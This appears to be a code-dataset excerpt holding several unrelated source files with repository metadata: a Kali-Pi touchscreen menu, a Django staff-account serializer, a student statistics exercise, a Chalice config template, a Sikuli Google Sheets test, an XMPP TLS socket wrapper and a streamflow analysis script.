if button8.disable == 1:
return
# Lock
retPage="menu-1.py"
kalipi.screensaver(retPage)
menu1()
if number == 9:
if button9.disable == 1:
return
# Next page
pygame.quit()
page=os.environ["MENUDIR"] + "menu-2.py"
os.execvp("python", ["python", page])
sys.exit()
## Buttons ##
#############################
def menu1():
# Init Pygame
kalipi.screen()
# Outer Border
kalipi.border(tron_blu)
#############################
## Buttons ##
# Buttons and labels
# See variables at the top of the document to adjust the menu
# Title
titleButton.draw()
# First Row
# Button 1
button1.disable = 0 # "1" disables button
if button1.disable == 1:
button1.draw()
else:
# Add button launch code here
button1.fntColor = yellow
button1.draw()
# Button 2
button2.disable = 0 # "1" disables button
if button2.disable == 1:
button2.draw()
else:
# Add button launch code here
button2.draw()
# Button 3
button3.disable = 0 # "1" disables button
if button3.disable == 1:
button3.draw()
else:
# Add button launch code here
button3.draw()
# Second Row
# Button 4
button4.disable = 0 # "1" disables button
if button4.disable == 1:
button4.draw()
else:
# Add button launch code here
button4.fntColor = yellow
button4.draw()
# Button 5
button5.disable = 0 # "1" disables button
if button5.disable == 1:
button5.draw()
else:
# Add button launch code here
if check_vnc():
button5.fntColor = green
button5.draw()
else:
button5.fntColor = tron_whi
button5.draw()
# Button 6
button6.disable = 0 # "1" disables button
if button6.disable == 1:
button6.draw()
else:
# Add button launch code here
if check_terminal():
button6.fntColor = green
button6.draw()
else:
button6.fntColor = tron_whi
button6.draw()
# Third Row
# Button 7
button7.disable = 0 # "1" disables button
if button7.disable == 1:
button7.draw()
else:
# Add button launch code here
button7.fntColor = yellow
button7.draw()
# Button 8
button8.disable = 0 # "1" disables button
if button8.disable == 1:
button8.draw()
else:
# Add button launch code here
button8.draw()
# Button 9
button9.disable = 0 # "1" disables button
if button9.disable == 1:
button9.draw()
else:
# Add button launch code here
button9.draw()
## Buttons ##
#############################
#############################
## Input loop ##
while 1:
butNo=kalipi.inputLoop("menu-1.py")
button(butNo)
## Input loop ##
#############################
if __name__ == "__main__":
menu1()
| [
"[email protected]"
]
| |
dca6b846e015febbace846cc1f9076f111184cbe | 382034646e9d3e32c8e63e8d83d2dd7da5be4ef3 | /workery/tenant_api/serializers/staff.py | 9988858b14d0cbfa0d3e9175f319d0674e705928 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | wahello/workery-django | 80c88ecb7968951719af6857711891ec3787cf46 | 289318b0333d830c089f4492716c38d409c365ed | refs/heads/master | 2020-03-30T04:21:48.642659 | 2018-09-28T01:30:22 | 2018-09-28T01:30:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,320 | py | # -*- coding: utf-8 -*-
import logging
import phonenumbers
from datetime import datetime, timedelta
from dateutil import tz
from starterkit.drf.validation import (
MatchingDuelFieldsValidator,
EnhancedPasswordStrengthFieldValidator
)
from starterkit.utils import (
get_random_string,
get_unique_username_from_email,
int_or_none
)
from django.conf import settings
from django.contrib.auth.models import Group
from django.contrib.auth import authenticate
from django.db.models import Q, Prefetch
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.utils.http import urlquote
from rest_framework import exceptions, serializers
from rest_framework.response import Response
from rest_framework.validators import UniqueValidator
from shared_api.custom_fields import PhoneNumberField
from shared_foundation.constants import ASSOCIATE_GROUP_ID
from shared_foundation.models import SharedUser
from tenant_foundation.models import (
Comment,
StaffComment,
Staff
)
logger = logging.getLogger(__name__)
class StaffListCreateSerializer(serializers.ModelSerializer):
# OVERRIDE THE MODEL FIELDS AND ENFORCE THE FOLLOWING CUSTOM VALIDATION RULES.
given_name = serializers.CharField(
required=True,
allow_blank=False,
)
last_name = serializers.CharField(
required=True,
allow_blank=False,
)
address_country = serializers.CharField(
required=True,
allow_blank=False,
)
address_region = serializers.CharField(
required=True,
allow_blank=False,
)
address_locality = serializers.CharField(
required=True,
allow_blank=False,
)
postal_code = serializers.CharField(
required=True,
allow_blank=False,
)
street_address = serializers.CharField(
required=True,
allow_blank=False,
)
# We are overriding the `email` field to include unique email validation.
email = serializers.EmailField(
validators=[UniqueValidator(queryset=SharedUser.objects.all())],
required=True,
)
# All comments are created by our `create` function and not by
# `django-rest-framework`.
# comments = StaffCommentSerializer(many=True, read_only=True, allow_null=True)
# This is a field used in the `create` function if the user enters a
# comment. This field is *ONLY* to be used during the POST creation and
# will be blank during GET.
extra_comment = serializers.CharField(write_only=True, allow_null=True)
# This field is used to assign the user to the group.
account_type = serializers.CharField(
write_only=True,
allow_null=False,
required=True
)
# Custom formatting of our telephone fields.
fax_number = PhoneNumberField(allow_null=True, required=False)
telephone = PhoneNumberField(allow_null=True, required=False)
other_telephone = PhoneNumberField(allow_null=True, required=False)
# Add password adding.
password = serializers.CharField(
write_only=True,
required=True,
allow_blank=False,
max_length=63,
style={'input_type': 'password'},
validators = [
MatchingDuelFieldsValidator(
another_field='password_repeat',
message=_("Inputted passwords fields do not match.")
),
EnhancedPasswordStrengthFieldValidator()
]
)
password_repeat = serializers.CharField(
write_only=True,
required=True,
allow_blank=False,
max_length=63,
style={'input_type': 'password'}
)
is_active = serializers.BooleanField(
write_only=True,
required=True,
error_messages={
"invalid": _("Please pick either 'Yes' or 'No' choice.")
}
)
# Meta Information.
class Meta:
model = Staff
fields = (
# Thing
'id',
'created',
'last_modified',
'account_type',
'description',
# Person
'given_name',
'middle_name',
'last_name',
'birthdate',
'join_date',
'gender',
# Misc (Read/Write)
'tags',
'is_active',
# # Misc (Read Only)
# 'comments',
# Misc (Write Only)
'extra_comment',
'password',
'password_repeat',
# Contact Point
'area_served',
'available_language',
'contact_type',
'email',
'personal_email',
'fax_number',
# 'hours_available', #TODO: FIX
'telephone',
'telephone_extension',
'telephone_type_of',
'other_telephone',
'other_telephone_extension',
'other_telephone_type_of',
# Postal Address
'address_country',
'address_locality',
'address_region',
'post_office_box_number',
'postal_code',
'street_address',
'street_address_extra',
# Geo-coordinate
'elevation',
'latitude',
'longitude',
# 'location' #TODO: FIX
)
def validate_telephone(self, value):
"""
Include validation on no-blanks
"""
if value is None:
raise serializers.ValidationError("This field may not be blank.")
return value
def validate_account_type(self, value):
"""
Include validation for valid choices.
"""
if int_or_none(value) is None:
raise serializers.ValidationError("Please select a valid choice.")
return value
def setup_eager_loading(cls, queryset):
""" Perform necessary eager loading of data. """
queryset = queryset.prefetch_related(
'owner',
'created_by',
'last_modified_by',
# 'comments'
'tags',
)
return queryset
def create(self, validated_data):
"""
        Override the `create` function to add extra functionality:
        - Create a `User` object in the public database.
        - Create a `SharedUser` object in the public database.
        - Create a `Staff` object in the tenant database.
        - If user has entered text in the 'extra_comment' field then we will
        create a `Comment` object and attach it to the `Staff` object.
        - We will attach the staff user who created this `Staff` object.
"""
# Format our telephone(s)
fax_number = validated_data.get('fax_number', None)
if fax_number:
fax_number = phonenumbers.parse(fax_number, "CA")
telephone = validated_data.get('telephone', None)
if telephone:
telephone = phonenumbers.parse(telephone, "CA")
other_telephone = validated_data.get('other_telephone', None)
if other_telephone:
other_telephone = phonenumbers.parse(other_telephone, "CA")
validated_data['fax_number'] = fax_number
validated_data['telephone'] = telephone
validated_data['other_telephone'] = other_telephone
# Extract our "email" field.
email = validated_data.get('email', None)
personal_email = validated_data.get('personal_email', None)
#-------------------
# Create our user.
#-------------------
owner = SharedUser.objects.create(
first_name=validated_data['given_name'],
last_name=validated_data['last_name'],
email=email,
is_active=validated_data['is_active'],
franchise=self.context['franchise'],
was_email_activated=True
)
logger.info("Created shared user.")
# Attach the user to the `group` group.
account_type = int_or_none(validated_data.get('account_type', None))
if account_type:
owner.groups.set([account_type])
# Update the password.
password = validated_data.get('password', None)
owner.set_password(password)
owner.save()
#---------------------------------------------------
# Create our `Staff` object in our tenant schema.
#---------------------------------------------------
# Create an "Staff".
staff = Staff.objects.create(
created_by=self.context['created_by'],
last_modified_by=self.context['created_by'],
description=validated_data.get('description', None),
# Person
given_name=validated_data['given_name'],
last_name=validated_data['last_name'],
middle_name=validated_data['middle_name'],
birthdate=validated_data.get('birthdate', None),
join_date=validated_data.get('join_date', None),
gender=validated_data.get('gender', None),
# Misc
created_from = self.context['created_from'],
created_from_is_public = self.context['created_from_is_public'],
# . . .
# Contact Point
area_served=validated_data.get('area_served', None),
available_language=validated_data.get('available_language', None),
contact_type=validated_data.get('contact_type', None),
email=email,
personal_email=personal_email,
fax_number=fax_number,
# 'hours_available', #TODO: IMPLEMENT.
telephone=telephone,
telephone_extension=validated_data.get('telephone_extension', None),
telephone_type_of=validated_data.get('telephone_type_of', None),
other_telephone=other_telephone,
other_telephone_extension=validated_data.get('other_telephone_extension', None),
other_telephone_type_of=validated_data.get('other_telephone_type_of', None),
# Postal Address
address_country=validated_data.get('address_country', None),
address_locality=validated_data.get('address_locality', None),
address_region=validated_data.get('address_region', None),
post_office_box_number=validated_data.get('post_office_box_number', None),
postal_code=validated_data.get('postal_code', None),
street_address=validated_data.get('street_address', None),
street_address_extra=validated_data.get('street_address_extra', None),
# Geo-coordinate
elevation=validated_data.get('elevation', None),
latitude=validated_data.get('latitude', None),
longitude=validated_data.get('longitude', None),
# 'location' #TODO: IMPLEMENT.
)
logger.info("Created staff member.")
# Update our staff again.
staff.owner = owner
staff.email = email
staff.save()
logger.info("Attached user object to staff member.")
#------------------------
# Set our `Tag` objects.
#------------------------
tags = validated_data.get('tags', None)
if tags is not None:
if len(tags) > 0:
staff.tags.set(tags)
#-----------------------------
# Create our `Comment` object.
#-----------------------------
extra_comment = validated_data.get('extra_comment', None)
if extra_comment is not None:
comment = Comment.objects.create(
created_by=self.context['created_by'],
last_modified_by=self.context['created_by'],
text=extra_comment,
created_from = self.context['created_from'],
created_from_is_public = self.context['created_from_is_public']
)
staff_comment = StaffComment.objects.create(
about=staff,
comment=comment,
)
# Update validation data.
# validated_data['comments'] = StaffComment.objects.filter(staff=staff)
validated_data['created_by'] = self.context['created_by']
validated_data['last_modified_by'] = self.context['created_by']
validated_data['extra_comment'] = None
validated_data['id'] = staff.id
# Return our validated data.
return validated_data
class StaffRetrieveUpdateDestroySerializer(serializers.ModelSerializer):
# owner = serializers.PrimaryKeyRelatedField(many=False, read_only=True)
# We are overriding the `email` field to include unique email validation.
email = serializers.EmailField(
validators=[UniqueValidator(queryset=Staff.objects.all())],
required=False
)
personal_email = serializers.EmailField(
validators=[UniqueValidator(queryset=Staff.objects.all())],
required=False
)
# Add password adding.
password = serializers.CharField(
write_only=True,
required=False,
allow_blank=True,
max_length=63,
style={'input_type': 'password'},
validators = [
MatchingDuelFieldsValidator(
another_field='password_repeat',
message=_("Inputted passwords fields do not match.")
),
EnhancedPasswordStrengthFieldValidator()
]
)
password_repeat = serializers.CharField(
write_only=True,
required=False,
allow_blank=True,
max_length=63,
style={'input_type': 'password'}
)
is_active = serializers.BooleanField(
write_only=True,
required=True,
error_messages={
"invalid": _("Please pick either 'Yes' or 'No' choice.")
}
)
# This field is used to assign the user to the group.
account_type = serializers.CharField(
write_only=True,
allow_null=False,
required=True
)
# All comments are created by our `create` function and not by
# # `django-rest-framework`.
# comments = StaffCommentSerializer(many=True, read_only=True)
#
# # This is a field used in the `create` function if the user enters a
# # comment. This field is *ONLY* to be used during the POST creation and
# # will be blank during GET.
# extra_comment = serializers.CharField(write_only=True, allow_null=True)
# Custom formatting of our telephone fields.
fax_number = PhoneNumberField(allow_null=True, required=False)
telephone = PhoneNumberField(allow_null=True, required=False)
other_telephone = PhoneNumberField(allow_null=True, required=False)
# Meta Information.
class Meta:
model = Staff
fields = (
# Thing
'id',
'created',
'last_modified',
# 'owner',
'description',
'account_type',
# Person
'given_name',
'middle_name',
'last_name',
'birthdate',
'join_date',
'gender',
# Misc (Read/Write)
'tags',
'is_active',
# # 'is_senior',
# # 'is_support',
# # 'job_info_read',
# 'how_hear',
#
# # Misc (Read Only)
# 'comments',
#
# # Misc (Write Only)
'password',
'password_repeat',
# 'extra_comment',
# Contact Point
'area_served',
'available_language',
'contact_type',
'email',
'personal_email',
'fax_number',
# 'hours_available', #TODO: FIX
'telephone',
'telephone_extension',
'telephone_type_of',
'other_telephone',
'other_telephone_extension',
'other_telephone_type_of',
# Postal Address
'address_country',
'address_locality',
'address_region',
'post_office_box_number',
'postal_code',
'street_address',
'street_address_extra',
# Geo-coordinate
'elevation',
'latitude',
'longitude',
# 'location' #TODO: FIX
)
def setup_eager_loading(cls, queryset):
""" Perform necessary eager loading of data. """
queryset = queryset.prefetch_related(
'owner',
'created_by',
'last_modified_by',
# 'comments'
'tags',
)
return queryset
def validate_account_type(self, value):
"""
Include validation for valid choices.
"""
if int_or_none(value) is None:
raise serializers.ValidationError("Please select a valid choice.")
return value
def validate_personal_email(self, value):
"""
Include validation for valid choices.
"""
if value is None or value == '':
raise serializers.ValidationError("This field may not be blank.")
return value
def update(self, instance, validated_data):
"""
Override this function to include extra functionality.
"""
# For debugging purposes only.
# print(validated_data)
# Get our inputs.
email = validated_data.get('email', instance.email)
personal_email = validated_data.get('personal_email', None)
#-------------------------------------
    # Bugfix: Create the `SharedUser` object if it is missing.
#-------------------------------------
if instance.owner is None:
owner = SharedUser.objects.filter(email=email).first()
if owner:
instance.owner = owner
instance.save()
logger.info("BUGFIX: Attached existing shared user to staff.")
else:
instance.owner = SharedUser.objects.create(
first_name=validated_data['given_name'],
last_name=validated_data['last_name'],
email=email,
is_active=validated_data['is_active'],
franchise=self.context['franchise'],
was_email_activated=True
)
instance.save()
logger.info("BUGFIX: Created shared user and attached to staff.")
#---------------------------
# Update `SharedUser` object.
#---------------------------
# Update the password if required.
password = validated_data.get('password', None)
if password:
instance.owner.set_password(password)
logger.info("Updated the password.")
# Update the account.
if email:
instance.owner.email = email
instance.owner.username = get_unique_username_from_email(email)
instance.owner.first_name = validated_data.get('given_name', instance.owner.first_name)
instance.owner.last_name = validated_data.get('last_name', instance.owner.last_name)
instance.owner.is_active = validated_data.get('is_active', instance.owner.is_active)
instance.owner.save()
logger.info("Updated the shared user.")
        # Attach the user to the group that corresponds to the selected account type.
        account_type = validated_data.get('account_type', None)
        if account_type is not None and account_type != "NaN":
            account_type = int(account_type)
            instance.owner.groups.set([account_type])
logger.info("Updated the group membership.")
#---------------------------
# Update `Staff` object.
#---------------------------
# Person
instance.description=validated_data.get('description', None)
instance.given_name=validated_data.get('given_name', None)
instance.last_name=validated_data.get('last_name', None)
instance.middle_name=validated_data.get('middle_name', None)
instance.birthdate=validated_data.get('birthdate', None)
instance.join_date=validated_data.get('join_date', None)
instance.gender=validated_data.get('gender', None)
# Misc
instance.hourly_salary_desired=validated_data.get('hourly_salary_desired', 0.00)
instance.limit_special=validated_data.get('limit_special', None)
instance.dues_date=validated_data.get('dues_date', None)
instance.commercial_insurance_expiry_date=validated_data.get('commercial_insurance_expiry_date', None)
instance.police_check=validated_data.get('police_check', None)
instance.drivers_license_class=validated_data.get('drivers_license_class', None)
instance.how_hear=validated_data.get('how_hear', None)
instance.last_modified_by = self.context['last_modified_by']
instance.last_modified_from = self.context['last_modified_from']
instance.last_modified_from_is_public = self.context['last_modified_from_is_public']
# 'organizations', #TODO: IMPLEMENT.
# Contact Point
instance.area_served=validated_data.get('area_served', None)
instance.available_language=validated_data.get('available_language', None)
instance.contact_type=validated_data.get('contact_type', None)
instance.email=email
instance.personal_email=personal_email
instance.fax_number=validated_data.get('fax_number', None)
# 'hours_available', #TODO: IMPLEMENT.
instance.telephone=validated_data.get('telephone', None)
instance.telephone_extension=validated_data.get('telephone_extension', None)
instance.telephone_type_of=validated_data.get('telephone_type_of', None)
instance.other_telephone=validated_data.get('other_telephone', None)
instance.other_telephone_extension=validated_data.get('other_telephone_extension', None)
instance.other_telephone_type_of=validated_data.get('other_telephone_type_of', None)
# Postal Address
instance.address_country=validated_data.get('address_country', None)
instance.address_locality=validated_data.get('address_locality', None)
instance.address_region=validated_data.get('address_region', None)
instance.post_office_box_number=validated_data.get('post_office_box_number', None)
instance.postal_code=validated_data.get('postal_code', None)
instance.street_address=validated_data.get('street_address', None)
instance.street_address_extra=validated_data.get('street_address_extra', None)
# Geo-coordinate
instance.elevation=validated_data.get('elevation', None)
instance.latitude=validated_data.get('latitude', None)
instance.longitude=validated_data.get('longitude', None)
# 'location' #TODO: IMPLEMENT.
# Save our instance.
instance.save()
logger.info("Updated the staff member.")
#------------------------
# Set our `Tag` objects.
#------------------------
tags = validated_data.get('tags', None)
if tags is not None:
if len(tags) > 0:
instance.tags.set(tags)
#---------------------------
# Attach our comment.
#---------------------------
extra_comment = validated_data.get('extra_comment', None)
if extra_comment is not None:
comment = Comment.objects.create(
created_by=self.context['last_modified_by'],
last_modified_by=self.context['last_modified_by'],
text=extra_comment,
created_from = self.context['last_modified_from'],
created_from_is_public = self.context['last_modified_from_is_public']
)
staff_comment = StaffComment.objects.create(
staff=instance,
comment=comment,
)
#---------------------------
# Update validation data.
#---------------------------
# validated_data['comments'] = StaffComment.objects.filter(staff=instance)
validated_data['last_modified_by'] = self.context['last_modified_by']
# validated_data['extra_comment'] = None
# Return our validated data.
return validated_data
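#---------------------------------------------------------------------------
# Illustrative sketch only: one way a view could drive the serializer above.
# The helper name and the `from_ip` / `is_public_ip` arguments are
# assumptions; the context keys mirror what `update` actually reads.
#---------------------------------------------------------------------------
def _example_update_staff(staff, data, request, franchise, from_ip, is_public_ip):
    serializer = StaffRetrieveUpdateDestroySerializer(
        staff,
        data=data,
        context={
            'last_modified_by': request.user,
            'last_modified_from': from_ip,
            'last_modified_from_is_public': is_public_ip,
            'franchise': franchise,
        }
    )
    serializer.is_valid(raise_exception=True)
    return serializer.save()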
| [
"[email protected]"
]
| |
05c69d86a598279fd05f359ed4b55dbf7789ecbb | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/96/usersdata/212/52473/submittedfiles/estatistica.py | 833c7315b45ff153b15c5cbf6daf19fb0e037238 | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,004 | py | # -*- coding: utf-8 -*-
def media(lista):
soma = 0
for i in range(0,len(lista),1):
soma = soma + lista[i]
resultado = soma/len(lista)
return resultado
#Based on the function above, write the function that computes the standard deviation of a list
def desvio(lista):
    soma=0
    m=media(lista)
    n=len(lista)
    for i in range(0,n,1):
        soma=soma+(lista[i]-m)**2
    soma=(soma/(n-1))**0.5
return soma
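#Quick illustrative checks of the two functions above: for [1.0, 2.0, 3.0] the
#mean is 2.0 and the sample standard deviation (n - 1 denominator) is 1.0.
assert media([1.0, 2.0, 3.0]) == 2.0
assert abs(desvio([1.0, 2.0, 3.0]) - 1.0) < 1e-9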
#Finally, write the main program: it reads the input and calls the functions defined above.
n1=int(input('enter the number of elements of the first list:'))
l1=[]
i=0
while i<n1:
    elemento=float(input('enter a number:'))
    l1.append(elemento)
    i=i+1
n2=int(input('enter the number of elements of the second list:'))
l2=[]
i=0
while i<n2:
    elemento=float(input('enter a number:'))
l2.append(elemento)
i=i+1
m1=media(l1)
print('%.2f'%m1)
dp1=desvio(l1)
print(dp1)
m2=media(l2)
print('%.2f'%m2)
dp2=desvio(l2)
print(dp2)
| [
"[email protected]"
]
| |
6a4ee598f47454db0493b131fcdf35f2e2f999bb | 66d04b8c46feef85c1666a4ba467124ee2c18450 | /lambdas/layer/.chalice/config.json.template.py | 3d375499fa4760654e91540304e9ac9cb68879d9 | [
"Apache-2.0"
]
| permissive | DataBiosphere/azul | 767abdefafbaf714fb78e5ee1aa5224b07fa7ec1 | 3722323d4eed3089d25f6d6c9cbfb1672b7de939 | refs/heads/develop | 2023-09-01T12:26:21.387100 | 2023-09-01T00:01:46 | 2023-09-01T00:01:46 | 139,095,537 | 23 | 22 | Apache-2.0 | 2023-09-14T18:00:44 | 2018-06-29T03:18:14 | Python | UTF-8 | Python | false | false | 263 | py | from azul import config
from azul.template import emit
emit({
"version": "2.0",
"app_name": config.qualified_resource_name("dependencies"),
"api_gateway_stage": config.deployment_stage,
"manage_iam_role": False,
"lambda_memory_size": 128,
})
| [
"[email protected]"
]
| |
e71c296d26a1fc078ab5b6286026948ef2b23459 | 0beaf9d78d03100b2aebaaac38fb343d425f2b6a | /tests/regression/gsheet/test_chrome_gsheet_100r_number_utf8chars.py | 57e29b0c39b7eec92f89400c4f2f06c356e2ae5d | []
| no_license | digitarald/Hasal | 462fc044bb4a754c8d76c0bfb0df519f1786fdcc | c496afae6ec2e3743148f3a6288b78f120100513 | refs/heads/master | 2021-01-13T14:29:44.471037 | 2016-11-04T10:49:19 | 2016-11-04T10:49:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | from lib.perfBaseTest import PerfBaseTest
class TestSikuli(PerfBaseTest):
def setUp(self):
super(TestSikuli, self).setUp()
def test_chrome_gsheet_100r_number_utf8chars(self):
self.test_url = self.env.GSHEET_TEST_URL_SPEC % self.env.TEST_TARGET_ID_100R_NUMBER_UTF8CHAR
self.sikuli_status = self.sikuli.run_test(self.env.test_name, self.env.output_name, test_target=self.test_url, script_dp=self.env.test_script_py_dp)
| [
"[email protected]"
]
| |
bc25b8a888412a5a123d8375db6d22ff7ea6760c | fd48fba90bb227017ac2da9786d59f9b9130aaf0 | /digsby/src/jabber/threadstreamsocket.py | bec1c1382c048055bceedd2e48336ceb8812b1b6 | [
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | niterain/digsby | bb05b959c66b957237be68cd8576e3a7c0f7c693 | 16a62c7df1018a49eaa8151c0f8b881c7e252949 | refs/heads/master | 2021-01-18T10:07:10.244382 | 2013-11-03T02:48:25 | 2013-11-03T02:48:25 | 5,991,568 | 1 | 0 | null | 2013-11-03T02:48:26 | 2012-09-28T02:24:50 | Python | UTF-8 | Python | false | false | 8,488 | py | from asynchat import async_chat
from util.threads.threadpool2 import threaded
from common import netcall
from util.callbacks import callsback
from common import pref
import sys
import socket
import logging
import common
from util.primitives.synchronization import lock
from util.primitives.funcs import get

# Unique "missing value" marker used when inspecting exception args in handle_error.
sentinel = object()
try:
import M2Crypto
if M2Crypto.version_info < (0, 16):
tls_available = 0
else:
from M2Crypto import SSL
from M2Crypto.SSL import SSLError
import M2Crypto.SSL.cb
tls_available = 1
SSL_ERROR_WANT_WRITE = SSL.m2.ssl_error_want_write
SSL_ERROR_WANT_READ = SSL.m2.ssl_error_want_read
except ImportError:
tls_available = 0
class ThreadStreamSocket(common.socket):
ac_in_buffer_size = 4096 * 16
ac_out_buffer_size = 4096 * 16
def __init__(self, sock, collect, term, on_close, on_error, ssl=False):
self.term = term
self.tls = None if not ssl else sock
self.collect_incoming_data = collect
self.set_terminator(self.term)
self.__logger=logging.getLogger("ThreadStreamSocket")
self.on_close = on_close
self.on_error = on_error
self.killed = False
self.lastbuffer = ''
self.__want_write = False
self.__want_read = False
common.socket.__init__(self, sock)
def found_terminator(self):
self.set_terminator(self.term)
def handle_error(self, e=None):
import traceback;traceback.print_exc()
t, v = sys.exc_info()[:2]
if t is not None:
msg = get(get(v.args, 0, 'say what?'), 'message', '')
if msg.startswith('bad write retry'):
assert False
self.__logger.error('Got that weird-ass "bad write retry" message in jabber socket')
# return
sslzero_closes = pref('jabber.ssl_error_zero.should_close', type = bool, default = True)
if t is SSLError and get(v.args, 0, sentinel) == 0:
                self.__logger.warning('SSL error 0!')
                if not sslzero_closes:
                    self.__logger.warning('\tnot closing')
return
self.__logger.debug('handle_error in %r', self)
async_chat.close(self)
if not self.killed:
self.killed = True
self.on_error()
def handle_close(self):
self.__logger.debug('handle_close in %r', self)
async_chat.close(self)
if not self.killed:
self.killed = True
self.on_close()
@lock
@callsback
def make_tls(self, ctx, callback=None):
self._realfileno = self._fileno
self.socket.setblocking(True)
self.del_channel()
dbg = self.__logger.debug
def blocking_connect():
try:
dbg("Creating TLS connection")
self.tls = SSL.Connection(ctx, self.socket)
dbg("Setting up TLS connection")
self.tls.setup_ssl()
dbg("Setting TLS connect state")
self.tls.set_connect_state()
dbg("Starting TLS handshake")
# self.tls.setblocking(True)
self.tls.connect_ssl()
self.socket.setblocking(False)
self.tls.setblocking(False)
self.ssocket = self.socket
self.socket = self.tls
except Exception, e:
try:
self.socket.close()
self.tls.close()
dbg('There was an exception in TLS blocking_connect: %r', e)
except Exception:
pass
raise e
def win():
self._fileno = self._realfileno
self.add_channel()
callback.success()
def lose(e):
netcall(callback.error)
threaded(blocking_connect)(success = lambda: netcall(win), error=lose)
def recv(self, buffer_size=4096):
self.__want_read = False
try:
return common.socket.recv(self, buffer_size)
except SSLError, e:
if e.args[0] == SSL_ERROR_WANT_WRITE:
self.__want_write = True
self.__want_read = False
self.__logger.warning("read_want_write")
return ""
elif e.args[0] == SSL_ERROR_WANT_READ:
self.__want_write = False
self.__want_read = True
self.__logger.warning("read_want_read")
return ""
else:
raise socket.error(e)
def send(self, buffer):
self.__want_write = False
# buffer = str(buffer)
if self.tls is None:
return common.socket.send(self, buffer)
## # M2Crypto returns -1 to mean "retry the last write." It has the
## # strange requirement that exactly the same bytes are tried again
## # during the next write--so we need to keep our own buffer.
r = None
if not self.lastbuffer:
try:
r = self.socket.sendall(buffer)
except SSLError, e:
if e.args[0] == SSL_ERROR_WANT_WRITE:
self.__want_write = True
self.__want_read = False
self.__logger.warning("write_want_write")
self.lastbuffer = buffer # -1: store the bytes for later
return len(buffer) # consume from asyncore
elif e.args[0] == SSL_ERROR_WANT_READ:
self.__want_write = False
self.__want_read = True
self.__logger.warning("write_want_read")
return 0
else:
raise socket.error(e, r)
else:
if r < 0:
raise socket.error('unknown -1 for ssl send')
return r
else:
try:
# we've got saved bytes--send them first.
r = self.socket.sendall(self.lastbuffer)
except SSLError, e:
if e.args[0] == SSL_ERROR_WANT_WRITE:
self.__want_write = True
self.__want_read = False
self.__logger.warning("write_want_write (buffer)")
elif e.args[0] == SSL_ERROR_WANT_READ:
self.__want_write = False
self.__want_read = True
self.__logger.warning("write_want_read (buffer)")
else:
raise socket.error(e, r)
else:
if r < 0:
raise socket.error('unknown -1 for ssl send (buffer)')
elif r < len(self.lastbuffer):
self.lastbuffer = self.lastbuffer[r:]
else:
self.lastbuffer = ''
return 0
def initiate_send(self):
#if there's nothing else in the socket buffer, the super class initiate_send won't call send
# and self.lastbuffer won't be flushed.
if self.lastbuffer:
assert self.tls is not None
assert self.__want_write
self.send(None)
return
return common.socket.initiate_send(self)
def readable (self):
"predicate for inclusion in the readable for select()"
assert not (self.__want_read and self.__want_write)
return not self.__want_write and (self.__want_read or
common.socket.readable(self))# and not self.lastbuffer
def writable (self):
assert not (self.__want_read and self.__want_write)
"predicate for inclusion in the writable for select()"
# return len(self.ac_out_buffer) or len(self.producer_fifo) or (not self.connected)
# this is about twice as fast, though not as clear.
return (common.socket.writable(self) #async buffer + connection
or self.lastbuffer #out buffer
or self.__want_write) and not self.__want_read
def _repr(self):
return 'wr:%s ww:%s lb:%s' % (self.__want_read, self.__want_write, self.lastbuffer)
class ThreadStreamSSLSocket(common.socket):
def __init__(self, sock, collect, term):
self.collect_incoming_data = collect
self.set_terminator(term)
self.__logger = logging.getLogger("ThreadStreamSSLSocket")
common.socket.__init__(self, sock)
| [
"[email protected]"
]
| |
252a725708758cf720a94811657ecfdfd0b1d90d | 0206ac23a29673ee52c367b103dfe59e7733cdc1 | /src/crcm5/analyse_hdf/lake_effect_on_streamflow_quantiles.py | f129054251e6b9dd8519fa5d776392060593cf5a | []
| no_license | guziy/RPN | 2304a93f9ced626ae5fc8abfcc079e33159ae56a | 71b94f4c73d4100345d29a6fbfa9fa108d8027b5 | refs/heads/master | 2021-11-27T07:18:22.705921 | 2021-11-27T00:54:03 | 2021-11-27T00:54:03 | 2,078,454 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 7,676 | py | import os
from datetime import datetime
import brewer2mpl
from matplotlib.axes import Axes
from matplotlib.font_manager import FontProperties
from matplotlib.ticker import MaxNLocator, ScalarFormatter
from crcm5 import infovar
from data import cehq_station
from data.cehq_station import Station
from data.cell_manager import CellManager
from . import do_analysis_using_pytables as analysis
import matplotlib.pyplot as plt
import numpy as np
__author__ = 'huziy'
images_folder = "/home/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/images_for_lake-river_paper"
from . import common_plot_params as cpp
def plot_one_to_one_line(the_ax):
assert isinstance(the_ax, Axes)
x1, x2 = the_ax.get_xlim()
y1, y2 = the_ax.get_ylim()
lims = [x1, x2, y1, y2]
z = min(lims), max(lims)
the_ax.plot(z, z, "-.k")
def main():
start_year = 1980
end_year = 2010
start_date = datetime(start_year, 1, 1)
end_date = datetime(end_year, 12, 31)
ids_with_lakes_upstream = [
"104001", "093806", "093801", "081002", "081007", "080718"
]
selected_station_ids = ["092715", "074903", "080104", "081007", "061905",
"093806", "090613", "081002", "093801", "080718", "104001"]
selected_station_ids = ids_with_lakes_upstream
# Get the list of stations to do the comparison with
stations = cehq_station.read_station_data(
start_date=start_date,
end_date=end_date,
selected_ids=selected_station_ids
)
# add hydat stations
# province = "QC"
# min_drainage_area_km2 = 10000.0
# stations_hd = cehq_station.load_from_hydat_db(start_date=start_date, end_date=end_date,
# province=province, min_drainage_area_km2=min_drainage_area_km2)
# if not len(stations_hd):
# print "No hydat stations satisying the conditions: period {0}-{1}, province {2}".format(
# str(start_date), str(end_date), province
# )
# stations.extend(stations_hd)
# brewer2mpl.get_map args: set name set type number of colors
bmap = brewer2mpl.get_map("Set1", "qualitative", 9)
path1 = "/skynet3_rech1/huziy/hdf_store/quebec_0.1_crcm5-hcd-r.hdf5"
label1 = "CRCM5-L1"
